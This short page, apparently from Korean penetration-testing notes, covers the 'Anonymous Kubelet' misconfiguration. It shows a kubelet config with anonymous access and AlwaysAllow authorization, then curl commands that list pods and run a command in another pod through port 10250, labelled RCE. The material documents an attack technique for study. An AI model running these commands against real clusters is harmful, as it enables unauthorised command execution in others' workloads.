Anonymous Kubelet
Last updated
Last updated
apiVersion: kubelet.config.k8s.io/v1beta1
authentication:
anonymous:
enabled: true # Anonymous 허용
webhook:
cacheTTL: 0s
enabled: true
x509:
clientCAFile: /etc/kubernetes/pki/ca.crt
authorization:
mode: AlwaysAllow # 모든 요청 인가 허용# pod 목록 조회
curl -sk https://'<node-ip>':10250/pods | jq '.items[].metadata | {namespace, name}'
# 다른 pod에 RCE
curl -k https://'<node-ip>':10250/run/<namespace>/<pod>/<container> -d "cmd=hostname"